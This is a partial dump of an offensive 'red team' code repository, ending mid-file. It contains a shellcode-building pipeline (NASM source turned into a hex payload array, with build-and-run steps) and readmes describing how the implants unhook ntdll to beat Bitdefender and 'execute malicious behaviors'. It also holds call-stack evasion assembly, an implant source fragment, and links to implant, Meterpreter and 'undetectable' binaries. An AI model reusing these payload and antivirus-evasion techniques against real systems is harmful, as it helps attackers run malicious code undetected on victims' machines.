/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | a20789d862bd7d7720a906d34c758f8b54de7636 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "UgH6OIScwCTMo75t+Bb7MMmzMHyfpbovZJg01aBN5tOWC/vBgW/Xz9BZIfIFjdEDlr0+3rj0VELTK64tWo6i3Q==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_QueueUserAPC\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/Readme.md: -------------------------------------------------------------------------------- 1 | A lot of this code is based on/borrowed from course work from CRTO/CRTO II by ZeroPoint Security (ZPS). 
2 | 3 | For more information on the course(s), see the ZPS course catalogue: 4 | https://training.zeropointsecurity.co.uk/collections 5 | -------------------------------------------------------------------------------- /C/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C/code_exec/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C/code_exec/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/code_exec/system.bin -------------------------------------------------------------------------------- /C/custom_payload/Readme.md: -------------------------------------------------------------------------------- 1 | All the files necessary to compile and run custom Linux payloads. 
2 | -------------------------------------------------------------------------------- /C/custom_payload/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /C/custom_payload/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me -------------------------------------------------------------------------------- /C/custom_payload/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me.o -------------------------------------------------------------------------------- /C/custom_payload/call_me_2.bak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me_2.bak -------------------------------------------------------------------------------- /C/custom_payload/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54883ec4848b82f7573722f6269 2 | 6e48ba2f6563686f000000488955d848 3 | 8945d0488d5dd053488d1c246a0048b8 4 | 5041594c4f41442048ba474f45532048 5 | 4552b94521000048894df0488955e848 6 | 
8945e0488d4de05151488d3424488b3b 7 | ba00000000b83b0000000f05b83c0000 8 | 000f05002e7368737472746162002e74 9 | 657874000 10 | -------------------------------------------------------------------------------- /C/custom_payload/how-to: -------------------------------------------------------------------------------- 1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3 2 | ld -m elf_x86_64 -N -s -o call_me call_me.o 3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt 4 | python beautify.py 5 | copy the array printed by beautify.py into the payload section of system.c 6 | gcc -m64 -g system.c -o system.bin -O0 7 | ./system.bin 8 | 9 | -------------------------------------------------------------------------------- /C/custom_payload/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/system.bin -------------------------------------------------------------------------------- /C/custom_payload/useful.txt: -------------------------------------------------------------------------------- 1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200 2 | -------------------------------------------------------------------------------- /C/meterpreter/Readme.md: -------------------------------------------------------------------------------- 1 | Repository of Meterpreter binaries intended to facilitate research. 2 | -------------------------------------------------------------------------------- /C/meterpreter/meterpreter_re_me.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/meterpreter_re_me.exe -------------------------------------------------------------------------------- /C/meterpreter/patchmeup_meterpreter.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/patchmeup_meterpreter.exe -------------------------------------------------------------------------------- /C/undetectable/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | x86_64-w64-mingw32-gcc.exe .\undetectable.c -o undetectable.exe -l"ws2_32" -Wdiscarded-qualifiers -------------------------------------------------------------------------------- /C/undetectable/undetectable.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/undetectable/undetectable.exe -------------------------------------------------------------------------------- /Certs/Certificate-Steve S.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Certificate-Steve S.pdf -------------------------------------------------------------------------------- /Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf -------------------------------------------------------------------------------- /Certs/Malware Development Advanced - Vol.1-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - 
Vol.1-certificate.pdf -------------------------------------------------------------------------------- /Certs/Malware Development Advanced - Vol.2-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.2-certificate.pdf -------------------------------------------------------------------------------- /Certs/RTMLS_2024-06-14.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/RTMLS_2024-06-14.pdf -------------------------------------------------------------------------------- /Certs/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Certs/Red-Team-Ops-Completion.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-Completion.jpg -------------------------------------------------------------------------------- /Certs/Red-Team-Ops-II-Completion.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-II-Completion.jpg -------------------------------------------------------------------------------- /Certs/Sektor7_Malware Development Essentials-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development 
Essentials-certificate.pdf -------------------------------------------------------------------------------- /Certs/Sektor7_Malware Development Intermediate-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Intermediate-certificate.pdf -------------------------------------------------------------------------------- /Certs/Sektor7_Windows Evasion-certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Windows Evasion-certificate.pdf -------------------------------------------------------------------------------- /Certs/THM-JrPenTester.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-JrPenTester.png -------------------------------------------------------------------------------- /Certs/THM-Offensive_Pentesting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Offensive_Pentesting.png -------------------------------------------------------------------------------- /Certs/THM-Red_Team_Learning_Path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Red_Team_Learning_Path.png -------------------------------------------------------------------------------- /Certs/Udemy_Linux-PEAS.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Linux-PEAS.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Exploit-Dev.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Exploit-Dev.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Malware-Net-Java.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Malware-Net-Java.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Radare2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Radare2.jpg -------------------------------------------------------------------------------- /Certs/Udemy_RE-Windows-GUI.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Windows-GUI.jpg -------------------------------------------------------------------------------- /Certs/Udemy_Windows-PEAS.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Windows-PEAS.jpg -------------------------------------------------------------------------------- 
/Certs/Udemy_build_undetectable_malware_in_c.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_build_undetectable_malware_in_c.jpg -------------------------------------------------------------------------------- /Certs/VHL_Advanced+_Certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Advanced+_Certificate.pdf -------------------------------------------------------------------------------- /Certs/VHL_Basic_Certificate.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Basic_Certificate.pdf -------------------------------------------------------------------------------- /Certs/ZPS_DevOps_For_Pentesters.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/ZPS_DevOps_For_Pentesters.jpg -------------------------------------------------------------------------------- /Certs/zps_initial_access_cert.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/zps_initial_access_cert.jpg -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/Readme.md: -------------------------------------------------------------------------------- 1 | Beats Bitdefender by unhooking using a clean copy of ntdll hardcoded into the binary. 
Unfortunately has to drop the copy of ntdll to disk before loading it, still working on a way around that. 2 | -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! %s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | #open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W1 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 4 | del *.obj -------------------------------------------------------------------------------- /Cpp/BYOdll/version1/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version1/implant.exe -------------------------------------------------------------------------------- /Cpp/BYOdll/version2/Readme.md: -------------------------------------------------------------------------------- 1 | Beats BitDefender by unhooking all function calls by reloading ntdll hardcoded into the binary. ntdll is stored as a local variable in main so this program needs a BEEFY stack to manage it. This program suffers from the same limitation of dropping the hardcoded copy of ntdll to disk before loading. 
2 | -------------------------------------------------------------------------------- /Cpp/BYOdll/version2/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:4000000 4 | del *.obj -------------------------------------------------------------------------------- /Cpp/BYOdll/version2/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version2/implant.exe -------------------------------------------------------------------------------- /Cpp/BYOdll/version3/Readme.md: -------------------------------------------------------------------------------- 1 | This version loads a reflective NTDLL, copies it over (overwrites) the hooked NTDLL, and is then free to execute malicious behaviors. 
2 | -------------------------------------------------------------------------------- /Cpp/BYOdll/version3/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/badAsm/badAsm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm.exe -------------------------------------------------------------------------------- /Cpp/badAsm/badAsm_better.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_better.exe -------------------------------------------------------------------------------- /Cpp/badAsm/badAsm_rx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_rx.exe -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | 
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.log: -------------------------------------------------------------------------------- 1 |  bad_fn_ptr.cpp 2 | Creating library C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.lib and object C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exp 3 | bad_fn_ptr.vcxproj -> C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe 4 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/bad_fn_ptr.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.34.31933:TargetPlatformVersion=10.0.22621.0: 2 | Debug|x64|C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\| 3 | -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog -------------------------------------------------------------------------------- 
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb -------------------------------------------------------------------------------- 
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib -------------------------------------------------------------------------------- /Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb -------------------------------------------------------------------------------- /Cpp/call_stack/compile.bat: -------------------------------------------------------------------------------- 1 | nasm -f win64 payload.asm -o payload.o 2 | nasm -f win64 ramp.asm -o ramp.o 3 | x86_64-w64-mingw32-g++.exe main_clean.cpp ramp.o -o main_clean.exe -masm=intel -------------------------------------------------------------------------------- /Cpp/call_stack/main_clean.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_clean.exe -------------------------------------------------------------------------------- /Cpp/call_stack/main_dirty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_dirty.exe -------------------------------------------------------------------------------- /Cpp/call_stack/payload.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/payload.o -------------------------------------------------------------------------------- /Cpp/call_stack/ramp.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | default rel 3 | bits 64 4 | 5 | global onRamp 6 | global offRamp 7 | 8 | ;nasm -f win64 ramp.asm -o ramp.o 9 | onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx 10 | pop rax ; corrupt previous frame 11 | push rdx ; push the second argument (rdx), return_address per the signature above 12 | lea rax, [offRamp] ; get offRamp address 13 | push rax ; if payload returns, it'll return to our off ramp 14 | jmp rcx ; execute exec_mem 15 | 16 | offRamp: ; slide back into normal execution (dangerous!) 
17 | mov rax, [r13] ; get return_address 18 | jmp rax ; jump to return_address 19 | nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps -------------------------------------------------------------------------------- /Cpp/call_stack/ramp.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/ramp.o -------------------------------------------------------------------------------- /Cpp/clean_stacks/baseline.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/baseline.exe -------------------------------------------------------------------------------- /Cpp/clean_stacks/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/implant.exe -------------------------------------------------------------------------------- /Cpp/clean_stacks/implant_backup_1.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel 5 | 6 | /* Reference 7 | asm ( "assembly code" 8 | : output operands optional 9 | : input operands optional 10 | : list of clobbered registers optional 11 | ); 12 | */ 13 | 14 | extern "C" void onRamp(PVOID exec_mem, PVOID ret_addr); 15 | 16 | int main(void){ 17 | printf("Implant running...\n"); 18 | 19 | void * ret_addr = NULL; 20 | asm("lea %0, [rip+ReturnHere];" 21 | : "=r" (ret_addr) // ret_addr <- rip+ReturnHere 22 | : // no inputs 23 | : // no predefined clobbers 24 | ); 25 | 26 | printf("Return address: 
